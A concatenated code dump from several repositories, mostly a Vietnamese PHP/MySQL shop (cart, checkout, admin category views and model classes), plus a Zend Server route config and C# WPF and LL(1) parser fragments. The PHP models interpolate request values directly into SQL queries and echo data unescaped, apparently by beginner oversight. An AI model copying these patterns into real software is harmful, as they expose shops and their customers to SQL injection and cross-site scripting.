</li>
</ul>
<!--
<ul class="nav navbar-nav navbar-right" style="padding-right: 30px;">
<li class="nav2">
<a href="#"><i class="fa fa-bell nav1"></i></a>
</li>
<li>
<a href="#"><i class="fa fa-envelope nav1"></i></a>
</li>
</ul>
-->
</div>
</nav>
</div>
</div><file_sep>/views/hoanthanhdonhang/hoanthanhdonhang.php
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong>Hoàn thành đơn hàng</strong></li>
</ul>
</div>
</div>
</div>
<!-- pages-title-start -->
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>HOÀN TẤT ĐƠN HÀNG</h2>
</div>
</div>
</div>
</div>
</div>
<!-- pages-title-end -->
<!-- order-complete content section start -->
<section class="pages checkout order-complete section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12 text-center">
<div class="complete-title">
<p>Cảm ơn bạn. Đơn đặt hàng của bạn đã được nhận.</p>
<p>
Vui Lòng Chờ Xét Duyệt
<a href="?action=huy_session" style="color:red;font-weight: bold;"> Về trang chủ</a>
</p>
</div>
</div>
</div>
<div class="row">
<div class="col-xs-12 col-sm-6">
<div class="padding60">
<div class="log-title">
<h3><strong>ĐƠN ĐẶT HÀNG CỦA BẠN</strong></h3>
</div>
<div class="cart-form-text pay-details">
<table>
<thead>
<tr>
<th>Sản Phẩm</th>
<td>Tiền</td>
</tr>
</thead>
<tbody>
<tr>
<th><?php foreach ($_SESSION['sanpham'] as $value) { ?>
<?php echo $value['tenSP'].'<br>'; ?>
<?php } ?></th>
<td><?= number_format($_SESSION['tongtien']) ?> VND</td>
</tr>
<tr>
<th>Khuyến mãi</th>
<td><?php echo $_SESSION['giatriKM'].'%'; ?></td>
</tr>
</tbody>
<tfoot>
<tr>
<th>Tổng tiền</th>
<td>
<?php
if($_SESSION['giatriKM'] != 0){
$_SESSION['tongtien_KM'] = ( $_SESSION['tongtien'] - ($_SESSION['tongtien'] * ($_SESSION['giatriKM'] )) / 100 );
echo number_format($_SESSION['tongtien_KM']).' VND' ;
}
else{
echo number_format($_SESSION['tongtien']).' VND';
}
?>
</td>
</tr>
</tfoot>
</table>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-6">
<div class="order-details padding60">
<div class="log-title">
<h3><strong>CHI TIẾT KHÁCH HÀNG</strong></h3>
</div>
<div class="por-dse clearfix">
<ul>
<li><span>Tên KH<strong>:</strong></span><?php echo $data_user['ten']; ?></li>
<li><span>Email<strong>:</strong></span> <?php echo $data_user['email']; ?> </li>
<li><span>Số ĐT<strong>:</strong></span> <?php echo $data_user['sodienthoai']; ?> </li>
</ul>
</div>
</div>
<div class="order-address bill padding60">
<div class="log-title">
<h3><strong>ĐỊA CHỈ LIÊN HỆ</strong></h3>
</div>
<p>Phone: <?php echo $data_user['sodienthoai']; ?></p>
<p>Email: <?php echo $data_user['email']; ?></p>
</div>
</div>
</div>
</div>
</section>
</div>
</div>
<!-- order-complete content section end -->
<!-- Session keys used on this page: $_SESSION['giatriKM'], $_SESSION['sanpham'] (an array, iterate with foreach),
$_SESSION['tongtien_KM'], $_SESSION['tongtien'], $_SESSION['thanhtien'],
$_SESSION['tendangnhap'], $_SESSION['matkhau'], $_SESSION['admin']
-->
<?php
require_once('ketnoi.php');
/**
*
*/
class cuahang
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
	function loaisanpham() // in progress
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
	function sanpham_cuahang() // in progress
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
	//generic product search
function timkiem_sp($timkiem_sp)
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE tenSP LIKE '%$timkiem_sp%' ORDER BY idSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
	function sanpham_cuahangtheoid($idLoaiSP) // in progress
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE idLoaiSP = $idLoaiSP";
return $this->conn->query($query);
}
function color()
{
$query = "SELECT * FROM color";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function size()
{
$query = "SELECT * FROM size";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
	//filter products by colour or size
function chonsanpham_mau($id)
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE color.idcolor = $id ";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chonsanpham_size($id)
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE size.idsize = $id";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
	function chonsanpham_gia($a, $b) // in progress
{
$query = "SELECT *
from (((sanpham
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
INNER JOIN khuyenmai ON sanpham.idKM = khuyenmai.idKM)
WHERE Dongia > $a AND Dongia < $b ";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function chonsanpham_KM($gtkm)
{
$query = " SELECT * FROM (((sanpham
INNER JOIN khuyenmai ON khuyenmai.idKM = sanpham.idKM)
INNER JOIN size ON sanpham.idsize = size.idsize)
INNER JOIN color ON sanpham.idcolor = color.idcolor)
WHERE giatriKM = '$gtkm' ";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
	/* Pagination (unused sketch)
public function get_all_product(){
$query="SELECT * FROM sanpham";
$result = $this->db->select($query);
return $result;
}
$product_all=$product->get_all_product();
$product_count=mysqli_num_rows($product_all);
$product_button=ceil($product_count/6);
$i=1;
echo '<p>Trang:</p>';
for($i=1;$i<=$product_button;$i++)
{
echo '<a href="shop.php?trang='.$i.'">'.$i.'</a>';
}
*/
}
<file_sep>/admin/views_admin/loaisanpham/quanlyloaisanpham.php
<div class="col-md-12">
<div style="margin-bottom:5px;">
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=themloaisanpham_giaodien" class="btn btn-primary">Thêm</a>
<?php } else {
} ?>
</div>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách Danh Mục</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">ID</th>
<th style="text-align:center;">Tên danh mục</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $value) :
?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $value['idLoaiSP'] ?></td>
<td><?= $value['tenLSP'] ?></td>
<td>
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=sualoaisanpham&id=<?= $value['idLoaiSP'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoaloaisanpham&id=<?= $value['idLoaiSP'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa ">
<i class="fa fa-times"></i></a>
<?php } else {
} ?>
</td>
</tr>
<?php
endforeach;
?>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<file_sep>/admin/views_admin/loaisanpham/sua.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">SửaDanh mục</div>
<div class="panel-body">
<form method="POST" action="?action=sualoaisanpham_xl" enctype="multipart/form-data">
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Tên danh muc</div>
<div class="col-md-10">
<input type="hidden" name="idLoaiSP" value=<?php echo $data['idLoaiSP']; ?>>
<input required type="text" name="tenLSP" value=<?php echo $data['tenLSP']; ?>>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Cập nhập</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
</div>
</div><file_sep>/views/giohang/giohang2.php
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Giỏ hàng của bạn</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Giỏ Hàng Của Bạn</li>
</ol>
</div>
<div class="table-responsive cart_info">
<!-- &a=?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?> -->
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?>" method="POST">
<table class="table table-condensed">
<thead>
<tr class="cart_menu">
<td >Sản Phẩm</td>
<td>Thông Tin sản Phẩm</td>
<td >Giá</td>
<td >SL mua</td>
<td >SL trong Kho</td>
<td>Thành Tiền</td>
</tr>
</thead>
<tbody class="tbody">
<?php if(isset($_SESSION['sanpham'])){
$_SESSION['tongtien'] = 0;
$soluong = 0;
foreach ($_SESSION['sanpham'] as $key=>$value) {
$soluong++;
?> <!-- $key là id sp -->
<tr>
<td class="cart_product">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</td>
<td class="cart_description">
<h4><a href=""><?= $key.$value['tenSP'] ?></a></h4>
<p> </p>
</td>
<td class="cart_price">
<p><?= $value['Dongia'] ?>.000 VND</p>
</td>
<td class="cart_quantity">
<div class="cart_quantity_button">
<?php
if($value['soluong_kho'] >0 ){ ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php }else{ ?>
<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</td>
<td style="width: 150px; text-align: center;font-weight: bold;font-size: 20px;color: orange;">
<?php
if($value['soluong_kho'] < 0){
echo "Lỗi";
}else{
echo $value['soluong_kho'];
}
?>
</td>
<td class="cart_total" style="text-align: center;">
<p class="cart_total_price"><?php $_SESSION['tongtien'] += $value['thanhtien']; echo $value['thanhtien'].'.000 VND'; ?></p>
</td>
<td class="cart_delete">
<a class="cart_quantity_delete" href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>"><i class="fa fa-times"></i></a>
</td>
</tr>
<?php
$_SESSION['soluong'] = $soluong;
} }?>
<tr>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td style="font-size: 20px; color:orange; font-weight: bold; padding: 10px;">
Tổng Tiền: <?php
if(isset($_SESSION['tongtien'])){
echo $_SESSION['tongtien'].'.000 VND';
echo $_SESSION['soluong'];
}else{
echo "";
}
?>
</td>
<td>
</td>
</tr>
</tbody>
</table>
<a href="?action=giohang&act=xoagiohang_all" class="pull-right" style="padding: 30px; padding-bottom: 100px;">
Hủy giỏ hàng <i class="fa fa-times"></i>
</a>
<div style="padding: 30px; padding-bottom: 100px;">
<input class="pull-right" type="submit" value="Xác Nhận Giỏ Hàng">
</div>
</form>
</div>
</div>
</section> <!--/#cart_items-->
<script>
function TB_hethang() {
alert("Sản phẩm trong kho đã hết!");
}
</script>
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Giỏ hàng của bạn</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Giỏ Hàng Của Bạn</li>
</ol>
</div>
<div class="table-responsive cart_info">
<!-- &a=?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?> -->
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) { echo $value['Dongia'].'&b=';}?>" method="POST">
<table class="table table-condensed">
<thead>
<tr class="cart_menu">
<td class="image" style="width: 150px;">Sản Phẩm</td>
<td class="description">Thông Tin sản Phẩm</td>
<td class="price">Giá</td>
<td class="quantity">SL mua</td>
<td class="quantity">SL trong Kho</td>
<td class="total">Thành Tiền</td>
</tr>
</thead>
<tbody class="tbody">
<?php if(isset($_SESSION['sanpham'])){
$_SESSION['tongtien'] = 0;
$soluong = 0;
foreach ($_SESSION['sanpham'] as $key=>$value) {
$soluong++;
?> <!-- $key is the product id -->
<tr>
<td class="cart_product">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</td>
<td class="cart_description">
<h4><a href=""><?= $key.$value['tenSP'] ?></a></h4>
<p> </p>
</td>
<td class="cart_price">
<p><?= $value['Dongia'] ?>.000 VND</p>
</td>
<td class="cart_quantity">
<div class="cart_quantity_button">
<?php
if($value['soluong_kho'] >0 ){ ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php }else{ ?>
<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</td>
<td style="width: 150px; text-align: center;font-weight: bold;font-size: 20px;color: orange;">
<?php
if($value['soluong_kho'] < 0){
echo "Lỗi";
}else{
echo $value['soluong_kho'];
}
?>
</td>
<td class="cart_total" style="text-align: center;">
<p class="cart_total_price"><?php $_SESSION['tongtien'] += $value['thanhtien']; echo $value['thanhtien'].'.000 VND'; ?></p>
</td>
<td class="cart_delete">
<a class="cart_quantity_delete" href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>"><i class="fa fa-times"></i></a>
</td>
</tr>
<?php
$_SESSION['soluong'] = $soluong;
} }?>
<tr>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td>
</td>
<td style="font-size: 20px; color:orange; font-weight: bold; padding: 10px;">
Tổng Tiền: <?php
if(isset($_SESSION['tongtien'])){
echo $_SESSION['tongtien'].'.000 VND';
echo $_SESSION['soluong'];
}else{
echo "";
}
?>
</td>
<td>
</td>
</tr>
</tbody>
</table>
<a href="?action=giohang&act=xoagiohang_all" class="pull-right" style="padding: 30px; padding-bottom: 100px;">
Hủy giỏ hàng <i class="fa fa-times"></i>
</a>
<div style="padding: 30px; padding-bottom: 100px;">
<input class="pull-right" type="submit" value="Xác Nhận Giỏ Hàng">
</div>
</form>
</div>
</div>
</section> <!--/#cart_items-->
<script>
function TB_hethang() {
alert("Sản phẩm trong kho đã hết!");
}
</script>
<!-- cart item area start -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong> Shopping cart</strong></li>
</ul>
</div>
</div>
</div>
<div class="row">
<div class="col-md-12">
<div class="table-responsive">
<form action="?action=thanhtoan&a=<?php foreach ($_SESSION['sanpham'] as $value) {
echo $value['Dongia'] . '&b=';
} ?>" method="POST">
<table class="table-bordered ">
<thead>
<tr>
<th class="cart-item-img">Sản Phẩm</th>
<th class="cart-product-name">Thông tin sản phẩm</th>
<th class="edit">Số lượng mua</th>
<th class="move-wishlist">Số lượng kho</th>
<th class="unit-price">Thành tiền</th>
<th class="remove-icon">Delete</th>
</tr>
</thead>
<tbody class="text-center">
<?php if (isset($_SESSION['sanpham'])) {
$_SESSION['tongtien'] = 0;
$soluong = 0;
foreach ($_SESSION['sanpham'] as $key => $value) {
$soluong++;
?>
<!-- $key is the product id -->
<tr>
<td class="cart-item-img">
<a href="single-product.html">
<img height='90' width="100" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>">
</a>
</td>
<td class="cart-product-name">
<a href="single-product.html">Cras neque metus</a>
</td>
<td class="edit">
<a href="#"><?= $key . $value['tenSP'] ?></a>
</td>
<td class="move-wishlist">
<a href="#"><?= number_format($value['Dongia']) ?></a>
</td>
<td class="unit-price">
<span>
<div class="cart_quantity_button">
<?php
if ($value['soluong_kho'] > 0) { ?>
<a class="cart_quantity_up" href="?action=giohang&act=update_giohang&id=<?= $value['idSP'] ?>"> + </a>
<?php } else { ?>
<a class="cart_quantity_up" href="" onclick="TB_hethang()"> + </a>
<?php } ?>
<input class="cart_quantity_input" size="2" type="text" name="soluong" value="<?php echo $value['soluong']; ?>">
<a class="cart_quantity_down" href="?action=giohang&act=update_giohang_tru&id=<?= $value['idSP'] ?>"> - </a>
</div>
</span>
</td>
<td class="quantity">
<span>
<?php
if ($value['soluong_kho'] < 0) {
echo "Lỗi";
} else {
echo $value['soluong_kho'];
}
?></span>
</td>
<td class="subtotal">
<span><?= number_format($_SESSION['tongtien'] += $value['thanhtien']) ?></span>
</td>
<td class="remove-icon">
<a href="?action=giohang&act=xoagiohang&id=<?= $value['idSP'] ?>">
<img src="img/cart/btn_remove.png" alt="">
</a>
</td>
</tr>
<?php
$_SESSION['soluong'] = $soluong;
}
} ?>
</tbody>
</table>
</form>
<div class="shopping-button">
<div class="continue-shopping">
<button type="submit">continue shopping</button>
</div>
<div class="shopping-cart-left">
<button type="submit">Clear Shopping Cart</button>
<button type="submit">Update Shopping Cart</button>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-4">
<div class="discount-code">
<h3>Discount Codes</h3>
<p>Enter your coupon code if you have one.</p>
<input type="text">
<div class="shopping-button">
<button type="submit">apply coupon</button>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="estimate-shipping">
<h3>Estimate Shipping and Tax</h3>
<p>Enter your destination to get a shipping estimate.</p>
<form action="#">
<div class="form-box">
<div class="form-name">
<label> country <em>*</em> </label>
<select>
<option value="1">Afghanistan</option>
<option value="1">Algeria</option>
<option value="1">American Samoa</option>
<option value="1">Australia</option>
<option value="1">Bangladesh</option>
<option value="1">Belgium</option>
<option value="1">Bosnia and Herzegovina</option>
<option value="1">Chile</option>
<option value="1">China</option>
<option value="1">Egypt</option>
<option value="1">Finland</option>
<option value="1">France</option>
<option value="1">United State</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> State/Province </label>
<select>
<option value="1">Please select region, state or province</option>
<option value="1">Arizona</option>
<option value="1">Armed Forces Africa</option>
<option value="1">California</option>
<option value="1">Florida</option>
<option value="1">Indiana</option>
<option value="1">Marshall Islands</option>
<option value="1">Minnesota</option>
<option value="1">New Mexico</option>
<option value="1">Utah</option>
<option value="1">Virgin Islands</option>
<option value="1">West Virginia</option>
<option value="1">Wyoming</option>
</select>
</div>
</div>
<div class="form-box">
<div class="form-name">
<label> Zip/Postal Code </label>
<input type="text">
</div>
</div>
<div class="shopping-button">
<button type="submit">get a quote</button>
</div>
</form>
</div>
</div>
<div class="col-sm-4">
<div class="totals">
<p>subtotal <span>$1,540.00</span> </p>
<h3>Grand Total <span>$1,540.00</span></h3>
<div class="shopping-button">
<button type="submit">proceed to checkout</button>
</div>
<a href="#">Checkout with Multiple Addresses</a>
</div>
</div>
</div>
</div>
</div>
<!-- cart item area end --><file_sep>/admin/model_admin/trangchu.php
<?php
// MODEL FOR PRODUCT INFORMATION
require_once('ketnoi.php');
/**
*
*/
class trangchu
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
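	// The all_* helpers below back the admin home (trangchu) listings.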
function all_user()
{
$query = "SELECT * FROM user ORDER BY idUser";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_sanpham()
{
$query = "SELECT * FROM sanpham ORDER BY idSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_loaisanpham()
{
$query = "SELECT * FROM loaisanpham ORDER BY idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_hoadon()
{
$query = "SELECT * FROM hoadon ORDER BY idhoadon";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_hoadon_day($ngaymua)
{
$query = "SELECT * FROM hoadon WHERE ngaymua LIKE '%$ngaymua%' && trangthai='1' ORDER BY idhoadon";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_banner()
{
$query = "SELECT * FROM banner ORDER BY idbanner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_khuyenmai()
{
$query = "SELECT * FROM khuyenmai ORDER BY idKM";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all_layout()
{
$query = "SELECT * FROM layout";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function update_layout($mail, $diachi, $phone)
{
$query = "UPDATE layout SET mail='$mail', diachi='$diachi', phone='$phone' WHERE id = '1'";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=trangchu');
}
}
}
?>
| f90ebf154ba3f0e2c8edb2f3ff43936d3016ee83 | ["SQL", "PHP"] | 64 | PHP | hieuthanh1999/StoreHongAn | 0d6ca45b212e12ecb9a45642348c9e97a7884c03 | 2fe9dc9e78eef4f5813c74952361de09485d19d9 | refs/heads/master |
<repo_name>swilczynski/ZendServerWebApiModule<file_sep>/config/api/version-1.9.config.php
<?php
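// Console route definitions for Zend Server Web API version 1.9: each entry maps
// a CLI command (route pattern and options) to an action on webapi-api-controller.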
return array(
'min-zsversion' => '8.0',
'console' => array(
'router' => array(
'routes' => array(
'apmGetUrls' => array(
'options' => array(
'route' => 'apmGetUrls [--limit=] [--offset=] [--applicationId=] [--filter=] [--period=]',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'apmGetUrls',
'apiMethod' => 'get'
),
'group' => 'apm',
'info' => array(
'Get a list of URL statistics.',
array('--limit', 'The number of rows to retrieve. Default lists all rules up to an arbitrary limit set by the system.'),
array('--offset', 'A paging offset to begin the list from. Default: 0'),
array('--applicationId', 'Display URLs of a specific application. If not supplied, display URLs from all the applications.'),
array('--filter', 'Predefined filters/order
1 - “most time consuming” - order by number of samples multiply average time, descending.
2 - “slowest response time” - order by average time, descending.
3 - “most visited” - ordered by number of sample,s descending.
If not supplied, default is 1.'),
array('--period', 'Period in hours (one week is 24*7, etc.). Default is 24.'),
)
)
),
'apmGetUrlInfo' => array(
'options' => array(
'route' => 'apmGetUrlInfo --id= [--order=] [--period=]',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'apmGetUrlInfo',
'apiMethod' => 'get'
),
'group' => 'apm',
'info' => array(
'Get a single request statistics info with its requests. The requests can be filtered and ordered using \'period\' and \'order\' parameter',
array('--id', 'The URL ID to retrieve the info from.'),
array('--order', 'The order of the requests list. The format is like in \'order\' clause in SQL, e.g. \'from_time desc\' or \'until_time\'.'),
array('--period', 'Number of hours. Limits the requests list to a specific period - \'period\' hours back until now. Default is 24 (i.e. by default bring requests from the last 24 hours).'),
)
)
),
'zrayGetAllRequestsInfo' => array(
'options' => array(
'route' => 'zrayGetAllRequestsInfo [--from_timestamp=] [--limit=] [--offset=]',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'zrayGetAllRequestsInfo',
'apiMethod' => 'get'
),
'group' => 'zray',
'info' => array(
'Get a list of requests starting from a specific timestamp (same as `zrayGetRequestsInfo` but not by pageID). The API receives 3 parameters - `from_timestamp`, `limit` and `offset`. The default limit is 10.',
array('--from_timestamp', 'Specify the timestamp to get all the requests that came after (microseconds - 13 digits).'),
array('--limit', 'Limit number of requests. Default is 10. Max value is 500.'),
array('--offset', 'Get data starting from a specific offset. Default is 0.'),
)
)
),
'zrayGetCustomData' => array(
'options' => array(
'route' => 'zrayGetCustomData --requestId=',
'defaults' => array(
'controller' => 'webapi-api-controller',
'action' => 'zrayGetCustomData',
'apiMethod' => 'get'
),
'group' => 'zray',
'info' => array(
'Get all custom data stored for the current request. Custom data is collected using the ZRayExtension class API and is stored with the official data collected by ZRay’s default operations. Custom data can be formatted in any way the extension is designed to hold. This may mean an unusually large payload.',
array('--requestId', 'The request ID of the environment information to retrieve.'),
)
)
),
)
)
)
);
| 63a67a62cf8c56507f763b5866440098cf36be26 | ["PHP"] | 1 | PHP | swilczynski/ZendServerWebApiModule | 46636ebc18ecf39401f82c7d6da2b474b4082e45 | b0d2bb053e8b11cc7b6f72819f5d1e87684cb986 | refs/heads/master |
<file_sep>using System;
using System.Threading;
using System.Windows;
using System.Windows.Controls;
namespace Hilos
{
/// <summary>
    /// Interaction logic for MainWindow.xaml
/// </summary>
public partial class MainWindow : Window
{
public delegate void actualizarIU(TextBlock textBlock, string contador);
private int contador = 0;
public MainWindow()
{
InitializeComponent();
}
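        // Runs on a worker thread: WPF controls may only be touched from the UI
        // thread, so the text update is marshalled through Dispatcher.Invoke.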
private void ContadorAutomatico()
{
for (int i = 1; i < 11; i++)
{
textBlockAutomatico.Dispatcher.Invoke(new Action(() =>
{
textBlockAutomatico.Text = i.ToString();
}));
Thread.Sleep(1000);
}
}
private void ContadorAutomaticoConHilo(object sender, RoutedEventArgs e)
{
textBlockAutomatico.Text = "0";
textBlockManual.Text = "0";
Thread hilo = new Thread(ContadorAutomatico);
hilo.Start();
}
private void ContadorManual(object sender, RoutedEventArgs e)
{
contador++;
textBlockManual.Text = contador.ToString();
}
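        // Counting on the UI thread itself: Thread.Sleep blocks the dispatcher,
        // so the window freezes and only the final value is rendered.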
private void ContadorAutomaticoSinHilo()
{
textBlockAutomatico.Text = "0";
textBlockManual.Text = "0";
for (int i = 1; i < 11; i++)
{
textBlockAutomatico.Text = i.ToString();
Thread.Sleep(1000);
}
}
private void ContadorSinHilo(object sender, RoutedEventArgs e)
{
contador = 0;
ContadorAutomaticoSinHilo();
}
}
}
| f30b102dedc306a8b6f5d392ac3fa032ac2faa71 | ["C#"] | 1 | C# | BaezCrdrmUV/contador-hilos-bet160 | ef58a99991506e08ed11b7566924eb50ea802198 | efab493309e46e67caca276e3c0412b47d95c339 | refs/heads/master |
<repo_name>tianqy/ll1_syntax_analysis<file_sep>/README.md
# ll1_syntax_analysis
An LL(1) syntax analysis program written in C#.
The project is developed in C# with a WinForms UI. The designer surface holds no controls; every control is created in code, so the interface reproduces faithfully and the project is easy to port.
The program performs its analysis against a fixed grammar and parse table: first enter a symbol string, then start the analysis to parse it.
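For example, with the built-in grammar (S->A, A->BA', A'->iBA'|Ɛ, B->CB', B'->+CB'|Ɛ, plus the C productions from the parse table), an input string such as `(i(#` should trace step by step to `OK`, while a string the table cannot match ends in `error!`.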
<file_sep>/LL1/Process.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace LL1
{
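    // One row of the analysis trace: step number, symbol stack contents,
    // remaining input, and the production (or action) applied at that step.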
class Process
{
private int index;
private string symbolStack;
private string inputString;
private string production;
public int Index
{
get { return index; }
set { index = value; }
}
public string SymbolStack
{
get { return symbolStack; }
set { symbolStack = value; }
}
public string InputString
{
get { return inputString; }
set { inputString = value; }
}
public string Production
{
get { return production; }
set { production = value; }
}
}
}
<file_sep>/LL1/Form1.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace LL1
{
public partial class Form1 : Form
{
Label lblTitle;
Label lblGrammer;
RichTextBox rtbGrammer;
Label lblAnalysisTable;
DataGridView dgvAnalysis;
Label lblSymbolString;
TextBox tbSymbolString;
Button btnAnalysis;
Label lblResult;
DataGridView dgvResult;
Label lblwarn;
string symbolString=""; //输入串
List<Process> processList = new List<Process>();
public Form1()
{
InitializeComponent();
            initForm(); // initialise the UI controls
            initData(); // initialise the data
            btnAnalysis.Click += new EventHandler(analysis); // wire up the click handler
}
        // button click handler: runs the analysis
private void analysis(object sender, EventArgs e)
{
symbolString = tbSymbolString.Text.ToString();
if (symbolString != "")
{
if (symbolString.ElementAt(symbolString.Length-1) != '#')
{
symbolString += "#";
}
}
else
{
